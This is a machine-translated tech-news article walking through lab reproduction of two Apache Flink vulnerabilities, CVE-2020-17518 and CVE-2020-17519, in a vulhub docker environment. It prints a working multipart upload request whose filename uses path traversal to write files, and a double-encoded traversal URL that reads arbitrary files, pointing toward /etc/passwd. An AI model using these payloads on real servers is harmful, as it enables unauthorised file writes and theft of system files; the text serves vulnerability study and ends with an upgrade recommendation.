Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze Apache Flink file operation vulnerabilities CVE-2020-17518 and CVE-2020-17519. The content is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Introduction to 0x00

Apache Flink is the data processing engine of the fire in recent years. It is highly respected by major manufacturers and has been applied to actual business scenarios. Many companies will choose Apache Flink as the object of selection. The core of Flink is a streaming data flow execution engine, which provides functions such as data distribution, data communication and fault tolerance for distributed computing of data streams. Based on the flow execution engine, Flink provides a number of API with higher levels of abstraction for users to write distributed tasks.

Overview of 0x01 vulnerabilities

CVE-2020-17519

A change introduced in Apache Flink 1.11.0 (also released in 1.11.1 and 1.11.2) allows an attacker to read any file on the JobManager local file system through the REST interface of the JobManager process.

CVE-2020-17518

Apache Flink 1.5.1 introduces a REST handler that allows you to write uploaded files anywhere on your local file system through maliciously modified HTTP headers.

0x02 scope of influence

CVE-2020-17519

1.11.0

1.11.1

1.11.2

CVE-2020-17518

Flink 1.5.1-1.11.2

0x03 environment building

1. The vulnerability environment is built using vulhub's docker environment, which can be downloaded from vulhub:

Https://github.com/vulhub/vulhub/

two。 After the download is completed, pass in the virtual machine with docker and docker-compose environment, and enter the directory

Cd vulhub-master/flink/CVE-2020-17519 /

3. Use docker-compose up-d to pull the vulnerability environment, because the version of 17519 vulnerability environment is 1.11.2, so only one vulnerability environment is needed to reproduce the two vulnerabilities. The appearance of "done" indicates that the pull is successful.

4. Enter http://your-ip:8081 in the browser to view the page

Recurrence of 0x04 vulnerabilities

CVE-2020-17518 recurrence

1. First, we use the CVE-2020-17518 vulnerability to write a file, and then construct the following packets on the home page to send them.

POST / jars/upload HTTP/1.1

Host: your-ip:8081

Accept-Encoding: gzip, deflate

Accept: * / *

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: multipart/form-data; boundary=-721072898

Content-Length: 149

-721072898

Content-Disposition: form-data; name= "jarfile"; filename= ".. / tmp/success"

Success

-721072898MB-

two。 Although 400 is returned in the above packet, it has been written to docker. Go to docker to check.

CVE-2020-17519 recurrence

1. If you cannot enter docker after writing above, you can take advantage of the CVE-2020-17519 vulnerability to read files. Enter the following payload on the front page to view the files in the tmp directory.

Http://172.16.1.147:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

two。 Modify the following payload to view the passwd file under etc

0x05 repair recommendation

It is recommended to upgrade to the secure version or the latest version.

The above content is how to analyze Apache Flink file manipulation vulnerabilities CVE-2020-17518 and CVE-2020-17519. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.